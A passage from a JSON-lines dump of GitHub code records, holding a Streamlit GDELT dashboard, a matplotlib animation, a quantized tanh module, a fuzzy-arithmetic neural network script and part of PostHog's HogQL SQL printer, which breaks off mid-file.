'num_sources', 'goldstein_scale'])\n\n hovertempate ='''<b>Country: %{location}</b><br>\n\n <br>Total events: %{customdata[0]:.3s}\n <br>Total articles: %{customdata[1]:.3s}\n <br>Total sources: %{customdata[2]:.3s}\n <br>Mean Tone: %{z:.2f}\n <br>Mean Goldstein scale: %{customdata[3]:.2f}\n '''\n with fig.batch_update():\n fig.update_layout(coloraxis_showscale=False)\n fig.update_layout(width=1000)\n fig.update_layout(margin=go.layout.Margin(l=0, r=0, b=0, t=0),)\n fig.update_xaxes(showticklabels=False)\n fig.update_yaxes(showticklabels=False)\n fig.update_traces(hovertemplate=hovertempate)\n fig.update_layout(geo=go.layout.Geo(projection=go.layout.geo.Projection(type='natural earth')))\n fig.update_layout(coloraxis_showscale=False)\n return fig\n\n\ndef create_wordcloud(actor_names):\n wordcloudmaker = WordCloud(background_color='white',\n width=1200,\n height=900,\n max_words=len(actor_names))\n wc_data = wordcloudmaker.generate_from_frequencies(actor_names)\n\n # Display the wordcloud\n fig = px.imshow(wc_data)\n with fig.batch_update():\n fig.update_layout(coloraxis_showscale=False)\n fig.update_xaxes(showticklabels=False)\n fig.update_yaxes(showticklabels=False)\n fig.layout['margin'] = {\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0}\n fig.data[0]['hoverinfo'] = 'skip'\n fig.data[0]['hovertemplate'] = None\n return fig\n\n\ndef human_format(num):\n '''Better formatting of large numbers\n Kudos to:\n '''\n num = float('{:.3g}'.format(num))\n magnitude = 0\n while abs(num) >= 1000:\n magnitude += 1\n num /= 1000.0\n return '{}{}'.format('{:f}'.format(num).rstrip('0').rstrip('.'), ['', 'K', 'M', 'B', 'T'][magnitude])\n\n\ndef get_actor_code_descriptions(codes):\n x = ''\n for code in codes:\n x += f' - {code}: {actor_codes.get(code)} \\n'\n return x\n\n\ndef show_page():\n\n # Additional options for the sidebar\n # Choose actor codes\n codes = st.sidebar.multiselect(\n label='Select Actor Types',\n default='EDU',\n options=list(actor_codes.keys()),\n help='Select one ore more Actor Type codes.')\n\n # Specify date range\n date_range = st.sidebar.slider(\n label='Date Range',\n min_value=datetime.date(2014, 2, 18),\n max_value=datetime.date(2022, 4, 2),\n value=(datetime.date(2014, 2, 18), datetime.date(2022, 4, 2)),\n step=datetime.timedelta(days=1),\n help='Select a date range.')\n\n # Specify time resolution\n binner_resolution = st.sidebar.selectbox(label='Time Resolution', options=['Day', 'Week', 'Month', 'Year'], index=1)\n\n # Show a progress bar\n progress = st.sidebar.progress(0.0)\n\n def _progress_function(value):\n '''Wrapper to make the progress bar work with Vaex.'''\n progress.progress(value)\n return True\n\n # Reformat the date_range\n date_min = date_range[0].strftime('%Y-%m-%d')\n date_max = date_range[1].strftime('%Y-%m-%d')\n if date_min == '2014-02-18':\n date_min = None\n if date_max == '2022-04-02':\n date_max = None\n\n st.title('GDELT Actor Explorer')\n\n if len(codes) > 0:\n\n st.subheader('Actor types selected')\n st.markdown(get_actor_code_descriptions(codes))\n\n # Compute the filter\n filter = create_filter(codes, date_min, date_max)\n # Compute all relevant data needed for visualisation\n data = compute_data(filter=filter, binner_resolution=binner_resolution, progress_function=_progress_function)\n\n # The visualisation of the data starts here\n\n # Plot the global single value summary stats\n avg_tone, goldstein_scale, total_events, total_sources, total_articles, gdf, gdfc, actor_names = data\n\n st.subheader('Summary statistics')\n metric_cols = st.columns(5)\n metric_cols[0].metric(label='Events', value=human_format(total_events))\n metric_cols[1].metric(label='Articles', value=human_format(total_articles))\n metric_cols[2].metric(label='Sources', value=human_format(total_sources))\n metric_cols[3].metric(label='Avg. Tone', value=f'{avg_tone:.2f}')\n metric_cols[4].metric(label='Goldstein Scale', value=f'{goldstein_scale:.2f}')\n\n col_left, col_right = st.columns(2)\n col_left.subheader(f'Average Tone per {binner_resolution.lower()}')\n col_left.plotly_chart(create_line_plot(gdf, 'Date', 'mean_avg_tone', 'std_avg_tone'),\n use_container_width=True)\n\n col_right.subheader(f'Goldstein scale per {binner_resolution.lower()}')\n col_right.plotly_chart(create_line_plot(gdf, 'Date', 'mean_goldstein_scale', 'std_goldstein_scale'),\n use_container_width=True)\n\n st.subheader('Event statistics per Country')\n st.plotly_chart(create_world_map(gdfc), use_container_width=True)\n\n st.subheader('Actor names wordcloud')\n st.plotly_chart(create_wordcloud(actor_names), use_container_width=True)\n\n else:\n st.error('No actor codes selected. Please select at least one actor code.')\n st.stop()\n","repo_name":"vaexio/streamlit-600million-gdelt-news-articles","sub_path":"actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"35649336608","text":"# -*- coding: UTF-8 -*-\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# 更新する内容\ndef _update_plot(i, fig, im):\n rad = math.radians(i)\n\n # 前回のフレーム内容を一旦削除\n if len(im) > 0:\n im[0].remove()\n im.pop()\n\n im.append(plt.scatter(math.cos(rad), math.sin(rad)))\n\nfig = plt.figure()\n\n# グラフを中央に表示\nax = fig.add_subplot(1,1,1)\n\n# グラフの目盛範囲設定\nax.set_xlim([-1.5, 1.5])\nax.set_ylim([-1.5, 1.5])\n\nim = [] # フレーム更新の際に前回のプロットを削除するために用意\n\n# アニメーション作成\nani = animation.FuncAnimation(fig, _update_plot, fargs = (fig, im),\n frames = 360, interval = 1)\n\n# 表示\nplt.show()\n","repo_name":"ta-dadadada/particle_simulation","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72271410407","text":"import torch\nfrom changan_plugin_pytorch.march import March, get_march\nfrom changan_plugin_pytorch.nn import qat\n\nfrom .lut import LookUpTable\nfrom .multi_table_fit import MultiTableFit\n\n\nclass Tanh(torch.nn.Module):\n r\"\"\"\n x3/j3 quantized tanh accuracy is low in (-0.1, 0.1) interval\n j5 quantized tanh accuracy is low in (-0.01, 0.01) interval with\n recommeded usage: setting int16 input and output.\n \"\"\"\n _QAT_MODULE = qat.Tanh\n\n def __init__(self, lut):\n super(Tanh, self).__init__()\n self.lut = lut\n self.register_buffer(\"scale\", torch.tensor([1], dtype=torch.float32))\n\n def forward(self, data):\n return self.lut(data, self.scale)\n\n @classmethod\n def from_float(cls, mod):\n r\"\"\"Create a quantized module from a float module or qparams_dict\n\n Args: `mod` a float module\n \"\"\"\n assert type(mod) == cls._QAT_MODULE, (\n \"qat.\"\n + cls.__name__\n + \".from_float only works for \"\n + cls._FLOAT_MODULE.__name__\n )\n\n activation_post_process = mod.activation_post_process\n if get_march() in (March.BERNOULLI, March.BERNOULLI2):\n lut = LookUpTable(func=torch.tanh)\n else:\n # due to restrictive condition of int32 data range,\n # in linear fitting certain param will be clipped while slope\n # is near to zero, so here we set zero linear fitting interval.\n # use table and constant fit is enuogh to fit the tanh function\n lut = MultiTableFit(\n func=torch.tanh,\n dense_xmin=0.0,\n dense_xmax=2.0,\n sparse_xmin=2.0,\n sparse_xmax=5.0,\n left_line_xmin=0.0,\n left_line_xmax=0.0,\n right_line_xmin=5.0,\n right_line_xmax=5.0,\n out_type=activation_post_process.dtype,\n is_symmetric=True,\n symmetric_k=-1,\n )\n quantized_tanh = cls(lut)\n quantized_tanh.scale.copy_(activation_post_process.scale)\n return quantized_tanh\n","repo_name":"xingyun-xy/cap","sub_path":"changan_plugin_pytorch/nn/quantized/tanh.py","file_name":"tanh.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18685419198","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport random\nimport pickle\nimport os\nimport sys\n\n#All my CI code that i've written\nfrom SamsCI import *\n\n\nDATA_FOLDER = \"data/\"\n\n\nREGUALIZE = True if sys.argv[1] == \"reg\" else False\n\n\ndef s_round(a):\n return int((a * 1000) + 0.5) / 1000.0\n\ndef gen_10(bs,add_feature,op,wideValue=.001):\n samples = []\n labels = []\n fNumbers = []\n\n\n alpha = AlphaOps(op).alphaCuts\n\n #compute values\n for b in bs:\n a = s_round(max(0,b - wideValue))\n c = s_round(min(1,b + wideValue))\n b = s_round(b)\n fNumbers.append([a,b,b,c])\n\n #Compute pairs\n for A in fNumbers:\n for B in fNumbers:\n samples.append(add_feature + A + B)\n label = list(map(lambda x: min(1,max(0,x)),alpha([A,B])))\n labels.append(label)\n\n return samples,labels\n\n\ndef gen_full(bs,add_feature,op,wideValue=2):\n samples = []\n labels = []\n\n alpha = AlphaOps(op).alphaCuts\n\n for b1 in bs:\n\n for b2 in bs:\n\n\n A = list(map(s_round,[b1 - wideValue, b1, b1, b1 + wideValue]))\n B = list(map(s_round,[b2 - wideValue, b2, b2, b2 + wideValue]))\n\n\n label = list(map(s_round,alpha([A,B])))\n samples.append(add_feature + A + B)\n labels.append(label)\n\n return samples,labels\n\n\ndef generate_training(wideValue=2,op=\"add\",force=False,filename='gen_data',featureOp=False):\n\n f_op_map = {\n 'add':[0,0],\n 'sub':[1,0],\n 'mul':[0,1],\n 'div':[1,1]\n }\n\n\n if featureOp:\n add_feature = f_op_map[op]\n else:\n add_feature = []\n\n try:\n with open(DATA_FOLDER + filename + \"_\" + op + \"_\" + str(featureOp) + \".pickle\",'rb') as f:\n samples,labels = pickle.load(f)\n print(\"Reading: \" + filename + \"_\" + op + \"_\" + str(featureOp) + \".pickle\")\n\n except:\n print(\"Generating: \" + filename + \"_\" + op + \"_\" + str(featureOp) + \".pickle\")\n\n\n bs = random.sample(list(np.arange(0,1,.001)),500)\n\n\n samples,labels = gen_10(bs,add_feature,op)\n\n\n with open(DATA_FOLDER + filename + \"_\" + op + \"_\" + str(featureOp) + \".pickle\",'wb') as f:\n pickle.dump((samples,labels),f)\n\n return samples,labels\n\n\ndef create_combined(data):\n X = []\n y = []\n\n for el in data:\n X += el[0]\n y += el[1]\n\n\n combined = list(zip(X,y))\n random.shuffle(combined)\n\n X,y = zip(*combined)\n\n print(X[0])\n print(y[0])\n\n return X,y\n\n\nif sys.argv[2] == \"combined\":\n subs = generate_training(op='sub',featureOp=True)\n adds = generate_training(op='add',featureOp=True)\n X,y = create_combined([subs,adds])\nelif sys.argv[2] == \"combinedmul\":\n data1 = generate_training(op='sub',featureOp=True)\n data2 = generate_training(op='add',featureOp=True)\n data3 = generate_training(op='mul',featureOp=True)\n data4 = generate_training(op='div',featureOp=True)\n X,y = create_combined([data1,data2,data3,data4])\nelif sys.argv[2] == \"div\":\n X,y = generate_training(op='div',featureOp=False)\nelif sys.argv[2] == \"mul\":\n X,y = generate_training(op='mul',featureOp=False)\nelif sys.argv[2] == \"sub\":\n X,y = generate_training(op='sub',featureOp=False)\nelse:\n X,y = generate_training(op='add',featureOp=False)\n\n\n\ntrain_x, test_x, train_y, test_y = train_test_split(X,y,test_size=.2,random_state = 1)\n\n\nn_nodes_hl1 = 20\nn_nodes_hl2 = 20\nn_nodes_hl3 = 20\n\nn_classes = 4\n\n\nx = tf.placeholder('float',[None,len(train_x[0])])\ny = tf.placeholder('float',[None,4])\n\nx = tf.placeholder('float')\ny = tf.placeholder('float')\n\nweights = {\n 'h1_layer': tf.Variable(tf.random_normal([len(train_x[0]),n_nodes_hl1])),\n 'h2_layer': tf.Variable(tf.random_normal([n_nodes_hl1,n_nodes_hl2])),\n 'output_layer': tf.Variable(tf.random_normal([n_nodes_hl2, n_classes]))\n}\n\nbiases = {\n 'h1_layer': tf.Variable(tf.random_normal([n_nodes_hl1])),\n 'h2_layer': tf.Variable(tf.random_normal([n_nodes_hl2])),\n 'output_layer': tf.Variable(tf.random_normal([n_classes]))\n}\n\ndef neural_net_model(data):\n\n l1 = tf.add(tf.matmul(data,weights['h1_layer']), biases['h1_layer'])\n l1 = tf.nn.sigmoid(l1)\n\n l2 = tf.add(tf.matmul(l1,weights['h2_layer']), biases['h2_layer'])\n l2 = tf.nn.sigmoid(l2)\n\n output = tf.add(tf.matmul(l2,weights['output_layer']), biases['output_layer'])\n\n return output\n\n\n\n\ndef train_network(x):\n pred = neural_net_model(x)\n cost = tf.reduce_sum(tf.pow(pred - y,2))/(len(train_y))\n\n\n beta = .01\n\n if REGUALIZE:\n cost = tf.reduce_mean(cost +\n beta*tf.nn.l2_loss(weights['h1_layer']) +\n beta*tf.nn.l2_loss(weights['h2_layer']) +\n beta*tf.nn.l2_loss(weights['output_layer']))\n\n\n file = File(sys.argv[1] + \"_\" + sys.argv[2] + \"_\" + sys.argv[3] + \"_log.csv\")\n saver = tf.train.Saver()\n\n optimizer = tf.train.AdamOptimizer().minimize(cost)\n\n\n\n n_epochs = 5000\n printer = 10\n\n errors = []\n\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n\n\n\n try:\n with open(\"epoch.log\",\"rb\") as f:\n epoch = pickle.load(f)\n except:\n epoch = 0\n\n\n if epoch > 0:\n saver.restore(sess,\"./model_\" + sys.argv[1] + \"_\" + sys.argv[2] + \"_\" + sys.argv[3]+ \".ckpt\")\n\n\n test = [.432,.433,.433,.434,.443,.444,.444,.445]\n\n print(\"Starting: \" + sys.argv[1] + \"_\" + sys.argv[2]+ \"_\" + sys.argv[3])\n print(\"Dim: \",len(train_x))\n\n while epoch < n_epochs:\n\n\n _,c = sess.run([optimizer,cost],feed_dict = {x: train_x, y: train_y})\n\n\n\n\n #if epoch % printer == 0:\n #print(\"test: \",sess.run(pred,feed_dict={x:[test]}))\n #print(\"SOl: \",0.875, 0.877, 0.877, 0.879)\n\n preds = sess.run(pred, feed_dict={x:test_x})\n accuracy = getAccuarcy(preds,test_y)\n print(accuracy)\n file.writeA([c,accuracy])\n\n\n print(\"Epoch:\",epoch,\"completed out of:\", n_epochs, \"Loss:\", c)\n\n #save the epoch we are currently on\n with open(\"epoch.log\",\"wb\") as f:\n pickle.dump(epoch,f)\n #errors.append(c)\n saver.save(sess,\"model_\" + sys.argv[1] + \"_\" + sys.argv[2]+ \"_\" + sys.argv[3] + \".ckpt\")\n epoch += 1\n\n os.remove(\"epoch.log\")\n\n #print(sess.run(pred,feed_dict = {x:[test]}))\n\n\n\ndef getAccuarcy(preds,truths):\n prints = random.randint(0,len(preds))\n correct = 0\n i = 0\n\n for pred,truth in zip(preds,truths):\n\n pred = [ s_round(round(i,3)) for i in pred]\n truth = [ s_round(round(i,3)) for i in truth]\n\n if i == prints:\n print(\"Pred: \", pred)\n print(\"Truth: \",truth)\n #show_result(pred,truth)\n\n if pred == truth:\n correct += 1\n\n i += 1\n\n return (correct / len(preds)) * 100\n\n\n\n\n\ndef test_network():\n\n pred = neural_net_model(x)\n\n saver = tf.train.Saver()\n\n\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n\n saver.restore(sess,\"./first_run_tests/model_\" + sys.argv[1] + \"_\" + sys.argv[2] + \".ckpt\")\n\n\n preds = sess.run(pred, feed_dict={x:test_x})\n\n with open(sys.argv[1] + \"_\" + sys.argv[2] + \"_preds.pickle\",\"wb\") as f:\n pickle.dump((preds,test_y),f)\n\n\n\n #accuracy = getAccuarcy(preds,test_y)\n #print(accuracy)\n\n\n\n\nif __name__ == '__main__':\n\n #train_network(x)\n test_network()\n\n\n","repo_name":"samkreter/fuzzySetOperationNN","sub_path":"dnn.py","file_name":"dnn.py","file_ext":"py","file_size_in_byte":7611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39510939209","text":"import re\nfrom dataclasses import dataclass\nfrom datetime import datetime, date\nfrom difflib import get_close_matches\nfrom typing import List, Literal, Optional, Union, cast\nfrom uuid import UUID\n\nfrom posthog.hogql import ast\nfrom posthog.hogql.base import AST\nfrom posthog.hogql.constants import (\n MAX_SELECT_RETURNED_ROWS,\n HogQLGlobalSettings,\n)\nfrom posthog.hogql.functions import (\n ADD_OR_NULL_DATETIME_FUNCTIONS,\n HOGQL_CLICKHOUSE_FUNCTIONS,\n FIRST_ARG_DATETIME_FUNCTIONS,\n HOGQL_AGGREGATIONS,\n HOGQL_POSTHOG_FUNCTIONS,\n)\nfrom posthog.hogql.context import HogQLContext\nfrom posthog.hogql.database.models import Table, FunctionCallTable, SavedQuery\nfrom posthog.hogql.database.database import create_hogql_database\nfrom posthog.hogql.database.s3_table import S3Table\nfrom posthog.hogql.errors import HogQLException\nfrom posthog.hogql.escape_sql import (\n escape_clickhouse_identifier,\n escape_clickhouse_string,\n escape_hogql_identifier,\n escape_hogql_string,\n)\nfrom posthog.hogql.functions.mapping import ALL_EXPOSED_FUNCTION_NAMES, validate_function_args, HOGQL_COMPARISON_MAPPING\nfrom posthog.hogql.resolver import ResolverException, resolve_types\nfrom posthog.hogql.resolver_utils import lookup_field_by_name\nfrom posthog.hogql.transforms.in_cohort import resolve_in_cohorts\nfrom posthog.hogql.transforms.lazy_tables import resolve_lazy_tables\nfrom posthog.hogql.transforms.property_types import resolve_property_types\nfrom posthog.hogql.visitor import Visitor, clone_expr\nfrom posthog.models.property import PropertyName, TableColumn\nfrom posthog.models.team.team import WeekStartDay\nfrom posthog.models.utils import UUIDT\nfrom posthog.schema import MaterializationMode\nfrom posthog.utils import PersonOnEventsMode\n\n\ndef team_id_guard_for_table(table_type: Union[ast.TableType, ast.TableAliasType], context: HogQLContext) -> ast.Expr:\n \"\"\"Add a mandatory \"and(team_id, ...)\" filter around the expression.\"\"\"\n if not context.team_id:\n raise HogQLException(\"context.team_id not found\")\n\n return ast.CompareOperation(\n op=ast.CompareOperationOp.Eq,\n left=ast.Field(chain=[\"team_id\"], type=ast.FieldType(name=\"team_id\", table_type=table_type)),\n right=ast.Constant(value=context.team_id),\n type=ast.BooleanType(),\n )\n\n\ndef to_printed_hogql(query: ast.Expr, team_id: int) -> str:\n \"\"\"Prints the HogQL query without mutating the node\"\"\"\n return print_ast(\n clone_expr(query),\n dialect=\"hogql\",\n context=HogQLContext(team_id=team_id, enable_select_queries=True),\n pretty=True,\n )\n\n\ndef print_ast(\n node: ast.Expr,\n context: HogQLContext,\n dialect: Literal[\"hogql\", \"clickhouse\"],\n stack: Optional[List[ast.SelectQuery]] = None,\n settings: Optional[HogQLGlobalSettings] = None,\n pretty: bool = False,\n) -> str:\n prepared_ast = prepare_ast_for_printing(node=node, context=context, dialect=dialect, stack=stack, settings=settings)\n return print_prepared_ast(\n node=prepared_ast,\n context=context,\n dialect=dialect,\n stack=stack,\n settings=settings,\n pretty=pretty,\n )\n\n\ndef prepare_ast_for_printing(\n node: ast.Expr,\n context: HogQLContext,\n dialect: Literal[\"hogql\", \"clickhouse\"],\n stack: Optional[List[ast.SelectQuery]] = None,\n settings: Optional[HogQLGlobalSettings] = None,\n) -> ast.Expr:\n with context.timings.measure(\"create_hogql_database\"):\n context.database = context.database or create_hogql_database(context.team_id, context.modifiers)\n\n with context.timings.measure(\"resolve_types\"):\n node = resolve_types(node, context, dialect=dialect, scopes=[node.type for node in stack] if stack else None)\n if context.modifiers.inCohortVia == \"leftjoin\":\n with context.timings.measure(\"resolve_in_cohorts\"):\n resolve_in_cohorts(node, dialect, stack, context)\n if dialect == \"clickhouse\":\n with context.timings.measure(\"resolve_property_types\"):\n node = resolve_property_types(node, context)\n with context.timings.measure(\"resolve_lazy_tables\"):\n resolve_lazy_tables(node, dialect, stack, context)\n\n # We support global query settings, and local subquery settings.\n # If the global query is a select query with settings, merge the two.\n if isinstance(node, ast.SelectQuery) and node.settings is not None and settings is not None:\n for key, value in node.settings.model_dump().items():\n if value is not None:\n settings.__setattr__(key, value)\n node.settings = None\n\n # We add a team_id guard right before printing. It's not a separate step here.\n return node\n\n\ndef print_prepared_ast(\n node: ast.Expr,\n context: HogQLContext,\n dialect: Literal[\"hogql\", \"clickhouse\"],\n stack: Optional[List[ast.SelectQuery]] = None,\n settings: Optional[HogQLGlobalSettings] = None,\n pretty: bool = False,\n) -> str:\n with context.timings.measure(\"printer\"):\n # _Printer also adds a team_id guard if printing clickhouse\n return _Printer(\n context=context,\n dialect=dialect,\n stack=stack or [],\n settings=settings,\n pretty=pretty,\n ).visit(node)\n\n\n@dataclass\nclass JoinExprResponse:\n printed_sql: str\n where: Optional[ast.Expr] = None\n\n\nclass _Printer(Visitor):\n # NOTE: Call \"print_ast()\", not this class directly.\n\n def __init__(\n self,\n context: HogQLContext,\n dialect: Literal[\"hogql\", \"clickhouse\"],\n stack: Optional[List[AST]] = None,\n settings: Optional[HogQLGlobalSettings] = None,\n pretty: bool = False,\n ):\n self.context = context\n self.dialect = dialect\n self.stack: List[AST] = stack or [] # Keep track of all traversed nodes.\n self.settings = settings\n self.pretty = pretty\n self._indent = -1\n self.tab_size = 4\n\n def indent(self, extra: int = 0):\n return \" \" * self.tab_size * (self._indent + extra)\n\n def visit(self, node: AST):\n self.stack.append(node)\n self._indent += 1\n response = super().visit(node)\n self._indent -= 1\n self.stack.pop()\n\n if len(self.stack) == 0 and self.dialect == \"clickhouse\" and self.settings:\n if not isinstance(node, ast.SelectQuery) and not isinstance(node, ast.SelectUnionQuery):\n raise HogQLException(\"Settings can only be applied to SELECT queries\")\n settings = self._print_settings(self.settings)\n if settings is not None:\n response += \" \" + settings\n\n return response\n\n def visit_select_union_query(self, node: ast.SelectUnionQuery):\n self._indent -= 1\n queries = [self.visit(expr) for expr in node.select_queries]\n if self.pretty:\n query = f\"\\n{self.indent(1)}UNION ALL\\n{self.indent(1)}\".join([query.strip() for query in queries])\n else:\n query = \" UNION ALL \".join(queries)\n self._indent += 1\n if len(self.stack) > 1:\n return f\"({query.strip()})\"\n return query\n\n def visit_select_query(self, node: ast.SelectQuery):\n if self.dialect == \"clickhouse\":\n if not self.context.enable_select_queries:\n raise HogQLException(\"Full SELECT queries are disabled if context.enable_select_queries is False\")\n if not self.context.team_id:\n raise HogQLException(\"Full SELECT queries are disabled if context.team_id is not set\")\n\n # if we are the first parsed node in the tree, or a child of a SelectUnionQuery, mark us as a top level query\n part_of_select_union = len(self.stack) >= 2 and isinstance(self.stack[-2], ast.SelectUnionQuery)\n is_top_level_query = len(self.stack) <= 1 or (len(self.stack) == 2 and part_of_select_union)\n\n # We will add extra clauses onto this from the joined tables\n where = node.where\n\n joined_tables = []\n next_join = node.select_from\n while isinstance(next_join, ast.JoinExpr):\n if next_join.type is None:\n if self.dialect == \"clickhouse\":\n raise HogQLException(\"Printing queries with a FROM clause is not permitted before type resolution\")\n\n visited_join = self.visit_join_expr(next_join)\n joined_tables.append(visited_join.printed_sql)\n\n # This is an expression we must add to the SELECT's WHERE clause to limit results, like the team ID guard.\n extra_where = visited_join.where\n if extra_where is None:\n pass\n elif isinstance(extra_where, ast.Expr):\n if where is None:\n where = extra_where\n elif isinstance(where, ast.And):\n where = ast.And(exprs=[extra_where] + where.exprs)\n else:\n where = ast.And(exprs=[extra_where, where])\n else:\n raise HogQLException(\n f\"Invalid where of type {type(extra_where).__name__} returned by join_expr\", node=visited_join.where\n )\n\n next_join = next_join.next_join\n\n if node.select:\n # Only for ClickHouse: Gather all visible aliases, and/or the last hidden alias for\n # each unique alias name. Then make the last hidden aliases visible.\n if self.dialect == \"clickhouse\":\n visible_aliases = {}\n for alias in reversed(node.select):\n if isinstance(alias, ast.Alias):\n if not visible_aliases.get(alias.alias, None) or not alias.hidden:\n visible_aliases[alias.alias] = alias\n\n columns = []\n for column in node.select:\n if isinstance(column, ast.Alias):\n # It's either a visible alias, or the last hidden alias for this name.\n if visible_aliases.get(column.alias) == column:\n if column.hidden:\n if (\n isinstance(column.expr, ast.Field)\n and isinstance(column.expr.type, ast.FieldType)\n and column.expr.type.name == column.alias\n ):\n # Hide the hidden alias only if it's a simple field,\n # and we're using the same name for the field and the alias\n # E.g. events.event AS event --> events.evnet.\n column = column.expr\n else:\n # Make the hidden alias visible\n column = cast(ast.Alias, clone_expr(column))\n column.hidden = False\n else:\n # Always print visible aliases.\n pass\n else:\n # This is not the alias for this unique alias name. Skip it.\n column = column.expr\n columns.append(self.visit(column))\n else:\n columns = [self.visit(column) for column in node.select]\n else:\n columns = [\"1\"]\n window = (\n \", \".join(\n [f\"{self._print_identifier(name)} AS ({self.visit(expr)})\" for name, expr in node.window_exprs.items()]\n )\n if node.window_exprs\n else None\n )\n prewhere = self.visit(node.prewhere) if node.prewhere else None\n where = self.visit(where) if where else None\n group_by = [self.visit(column) for column in node.group_by] if node.group_by else None\n having = self.visit(node.having) if node.having else None\n order_by = [self.visit(column) for column in node.order_by] if node.order_by else None\n\n array_join = \"\"\n if node.array_join_op is not None:\n if node.array_join_op not in (\n \"ARRAY JOIN\",\n \"LEFT ARRAY JOIN\",\n \"INNER ARRAY JOIN\",\n ):\n raise HogQLException(f\"Invalid ARRAY JOIN operation: {node.array_join_op}\")\n array_join = node.array_join_op\n if len(node.array_join_list) == 0:\n raise HogQLException(f\"Invalid ARRAY JOIN without an array\")\n array_join += f\" {', '.join(self.visit(expr) for expr in node.array_join_list)}\"\n\n space = f\"\\n{self.indent(1)}\" if self.pretty else \" \"\n comma = f\",\\n{self.indent(1)}\" if self.pretty else \", \"\n\n clauses = [\n f\"SELECT{space}{'DISTINCT ' if node.distinct else ''}{comma.join(columns)}\",\n f\"FROM{space}{' '.join(joined_tables)}\" if len(joined_tables) > 0 else None,\n array_join if array_join else None,\n f\"PREWHERE{space}\" + prewhere if prewhere else None,\n f\"WHERE{space}\" + where if where else None,\n f\"GROUP BY{space}{comma.join(group_by)}\" if group_by and len(group_by) > 0 else None,\n f\"HAVING{space}\" + having if having else None,\n f\"WINDOW{space}\" + window if window else None,\n f\"ORDER BY{space}{comma.join(order_by)}\" if order_by and len(order_by) > 0 else None,\n ]\n\n limit = node.limit\n if self.context.limit_top_select and is_top_level_query:\n if limit is not None:\n if isinstance(limit, ast.Constant) and isinstance(limit.value, int):\n limit.value = min(limit.value, MAX_SELECT_RETURNED_ROWS)\n else:\n limit = ast.Call(\n name=\"min2\",\n args=[ast.Constant(value=MAX_SELECT_RETURNED_ROWS), limit],\n )\n else:\n limit = ast.Constant(value=MAX_SELECT_RETURNED_ROWS)\n\n if limit is not None:\n clauses.append(f\"LIMIT {self.visit(limit)}\")\n if node.limit_with_ties:\n clauses.append(\"WITH TIES\")\n if node.offset is not None:\n clauses.append(f\"OFFSET {self.visit(node.offset)}\")\n if node.limit_by is not None:\n clauses.append(f\"BY {', '.join([self.visit(expr) for expr in node.limit_by])}\")\n\n if node.settings is not None and self.dialect == \"clickhouse\":\n settings = self._print_settings(node.settings)\n if settings is not None:\n clauses.append(settings)\n\n if self.pretty:\n response = \"\\n\".join([f\"{self.indent()}{clause}\" for clause in clauses if clause is not None])\n else:\n response = \" \".join([clause for clause in clauses if clause is not None])\n\n # If we are printing a SELECT subquery (not the first AST node we are visiting), wrap it in parentheses.\n if not part_of_select_union and not is_top_level_query:\n if self.pretty:\n response = f\"({response.strip()})\"\n else:\n response = f\"({response})\"\n\n return response\n\n def visit_join_expr(self, node: ast.JoinExpr) -> JoinExprResponse:\n # return constraints we must place on the select query\n extra_where: Optional[ast.Expr] = None\n\n join_strings = []\n\n if node.join_type is not None:\n join_strings.append(node.join_type)\n\n if isinstance(node.type, ast.TableAliasType) or isinstance(node.type, ast.TableType):\n table_type = node.type\n while isinstance(table_type, ast.TableAliasType):\n table_type = table_type.table_type\n\n if not isinstance(table_type, ast.TableType) and not isinstance(table_type, ast.LazyTableType):\n raise HogQLException(f\"Invalid table type {type(table_type).__name__} in join_expr\")\n\n # :IMPORTANT: This assures a \"team_id\" where clause is present on every selected table.\n # Skip function call tables like numbers(), s3(), etc.\n if (\n self.dialect == \"clickhouse\"\n and not isinstance(table_type.table, FunctionCallTable)\n and not isinstance(table_type.table, SavedQuery)\n ):\n extra_where = team_id_guard_for_table(node.type, self.context)\n\n if self.dialect == \"clickhouse\":\n sql = table_type.table.to_printed_clickhouse(self.context)\n\n # Edge case. If we are joining an s3 table, we must wrap it in a subquery for the join to work\n if isinstance(table_type.table, S3Table) and (\n node.next_join or node.join_type == \"JOIN\" or node.join_type == \"GLOBAL JOIN\"\n ):\n sql = f\"(SELECT * FROM {sql})\"\n else:\n sql = table_type.table.to_printed_hogql()\n\n if isinstance(table_type.table, FunctionCallTable) and not isinstance(table_type.table, S3Table):\n if node.table_args is None:\n raise HogQLException(f\"Table function '{table_type.table.name}' requires arguments\")\n\n if table_type.table.min_args is not None and (\n node.table_args is None or len(node.table_args) < table_type.table.min_args\n ):\n raise HogQLException(\n f\"Table function '{table_type.table.name}' requires at least {table_type.table.min_args} argument{'s' if table_type.table.min_args > 1 else ''}\"\n )\n if table_type.table.max_args is not None and (\n node.table_args is None or len(node.table_args) > table_type.table.max_args\n ):\n raise HogQLException(\n f\"Table function '{table_type.table.name}' requires at most {table_type.table.max_args} argument{'s' if table_type.table.max_args > 1 else ''}\"\n )\n if node.table_args is not None and len(node.table_args) > 0:\n sql = f\"{sql}({', '.join([self.visit(arg) for arg in node.table_args])})\"\n elif node.table_args is not None:\n raise HogQLException(f\"Table '{table_type.table.to_printed_hogql()}' does not accept arguments\")\n\n join_strings.append(sql)\n\n if isinstance(node.type, ast.TableAliasType) and node.alias is not None and node.alias != sql:\n join_strings.append(f\"AS {self._print_identifier(node.alias)}\")\n\n elif isinstance(node.type, ast.SelectQueryType):\n join_strings.append(self.visit(node.table))\n\n elif isinstance(node.type, ast.SelectUnionQueryType):\n join_strings.append(self.visit(node.table))\n\n elif isinstance(node.type, ast.SelectQueryAliasType) and node.alias is not None:\n join_strings.append(self.visit(node.table))\n join_strings.append(f\"AS 